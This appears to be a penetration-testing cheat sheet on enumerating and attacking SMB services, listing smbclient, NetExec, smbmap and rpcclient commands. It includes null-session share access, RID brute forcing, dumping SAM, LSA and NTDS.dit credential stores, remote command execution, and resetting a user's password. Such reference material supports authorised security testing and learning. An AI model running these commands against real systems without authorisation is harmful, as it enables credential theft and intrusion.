SMB | 445, 139
Modern SMB (like SMBv2/v3) typically uses only TCP 445, while older versions (SMBv1) may use 139 and NetBIOS-related ports.
00. Basic
Find smb version
sudo tcpdump -s0 -n -i tun0 src $IP and port 139 -A -c 10 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.'
sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
smbclient -L //$IP
nmap -p 445,139 --script smb-protocols,smb-system-info,smb-os-discovery $IP
enum4linux -a $IP | tee enum4linux_output.txt01. SMBclient
## ------------------| Enum
smbclient //$IP
## ------------------| List all shares (Null session)
smbclient -N -L //$IP
## ------------------| List all shares with credentials
smbclient -L //$IP -U '<username>%<password>'
## ------------------| Login to the user
smbclient -U '<UserName>%<Password>' \\\\$IP\\c$
## ------------------| Connect to a specific share (interactive)
smbclient //$IP/<SHARENAME> -U '<username>%<password>'
## ------------------| Connect to a specific share with NT1 protocol (for older SMB versions)
smbclient -N //$IP/<SHARENAME> --option='client min protocol=NT1'
## ------------------| Download all files
smbclient -N //$IP/<SHARENAME> -U <USERNAME> -c "prompt OFF;recurse ON;mget *"
## ------------------| Upload file
put desktop.ini
## ------------------| List info about
## if it has ACL:Everyone:ALLOWED/OI|CI/FULL we can write/read
smbcacls -N //$IP/Department /Users
## ------------------| Connect to a specific share with other protocols
smbclient -L //$IP -U <username> -m SMB2
smbclient -L //$IP -U <username> -m SMB3
smbclient -L //$IP -U <username> -m NT1## ------------------| Enumarate hosts
nxc smb 192.168.3.201-203
## ------------------| Tricks
## nxc try to authenticate to domain account instead of local user accounts in default
## so use -d WORKGROUP to try with local user account
## ------------------| Enumarate shares / Basic info
nxc smb $IP
nxc smb $IP --shares
nxc smb $IP -u '' -p '' --shares
nxc smb $IP -u 'DoseNotExist' -p '' --shares
nxc smb $IP -u 'DoseNotExist' -H <NThash>
nxc smb $IP -d WORKGROUP -u 'DoseNotExist' -H <NThash>
## ------------------| Enumerate active sessions
nxc smb $IP -u UserName -p 'Password' --sessions
## ------------------| Enumerate disks
nxc smb $IP -u UserName -p 'Password' --disks
## ------------------| Enumerate logged on users
nxc smb $IP -u UserName -p 'Password' --loggedon-users
## ------------------| Enumerate domain users
nxc smb $IP -u UserName -p 'Password' --users
## ------------------| Enumerate users by bruteforcing RID
nxc smb $IP -u UserName -p 'Password' --rid-brute
## ------------------| Enumerate domain groups
nxc smb $IP -u UserName -p 'Password' --groups
## ------------------| Enumerate local groups
nxc smb $IP -u UserName -p 'Password' --local-groups
## ------------------| Identify SMB Signing Disabled
nxc smb --gen-relay-list output.txt 10.10.10.0/24
## ------------------| Enumarate password policy
## if Account Lockout Threshold: None; we can bruteforce
nxc smb $IP --pass-pol
nxc smb $IP -u '' -p '' --pass-pol
## ------------------| Dump SAM/LSA/NTDS.dit
nxc smb $IP -u UserName -p 'Password' --sam
nxc smb $IP -u UserName -p 'Password' --lsa
nxc smb $IP -u UserName -p 'Password' --ntds
nxc smb $IP -u UserName -p 'Password' --ntds vss
## ------------------| Execute Commands
## PowerShell
nxc winrm $IP -u melanie -p 'Welcome123!' -X "whoami /all"
## CMD
nxc winrm $IP -u melanie -p 'Welcome123!' -x "whoami /all"
## ------------------| Crawling shares
nxc smb $IP -u 'username' -p 'PassW0rd' -M spider_plus 03. SMBMap
## ------------------| General flags
## -H HOST IP of host
## --host-file FILE File containing a list of hosts
## -u USERNAME Username, if omitted null session assumed
## -p PASSWORD Password or NTLM hash
## --prompt Prompt for a password
## -s SHARE Specify a share (default C$), ex 'C$'
## -d DOMAIN Domain name (default WORKGROUP)
## -P PORT SMB port (default 445)
## -v Return the OS version of the remote host
## -x COMMAND Execute a command ex. 'ipconfig /all'
## -L List all drives on the specified host (requires ADMIN)
## -R [PATH] Recursively list dirs.
## -r [PATH] List contents of directory.
## -g FILE Output to a file in a grep friendly format,
## --dir-only List only directories, ommit files.
## --depth DEPTH Traverse a directory tree to a specific depth.
## --download PATH Download a file from the remote system,
## --upload Upload a file to the remote system ex.
## --delete PATH Delete a remote file, ex. 'C$\temp\msf.exe'
## --skip Skip delete file confirmation prompt
## ------------------| List shares
smbmap -H $IP
smbmap -u 'anonymous' -H $IP
smbmap -u 'anonymous' -p 'anonymous' -H $IP
## ------------------| Recursively list
smbmap -r directory -H $IP
## ------------------| Download file
smbmap -r directory -H $IP -A filename.txt -q04. RPCClient
## ------------------| Login as user
rpcclient -U 'support' $IP
rpcclient -U 'Administrator:Password' $IP
## ------------------| Null auth
rpcclient -U '' $IP
## ------------------| Enumarations
lookupnames Guest ### Resolves the "Guest" name to its associated SID.
enumdomusers ### Enumerates all users in the domain.
queryuser 0x450 ### Retrieves information about the user with the RID `0x450`.
enumprinters ### Enumerates all printers available in the network.
srvinfo ### Retrieves detailed information about the server.
enumdomains ### Enumerates all domains deployed within the network.
querydominfo ### Provides detailed information about the domain, server, and users within deployed domains.
netshareenumall ### Enumerates all available network shares.
queryuser <RID> ### Provides information about a specific user identified by the RID (Relative Identifier).
netsharegetinfo <share> ### Retrieves information about a specific network share.
## ------------------| Change users password
setuserinfo2 <UserAccount> 23 '<Password>'
## ------------------| Brute Forcing User RIDs
for i in $(seq 500 1100);do rpcclient -N -U "" $IP -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done Last updated
Was this helpful?
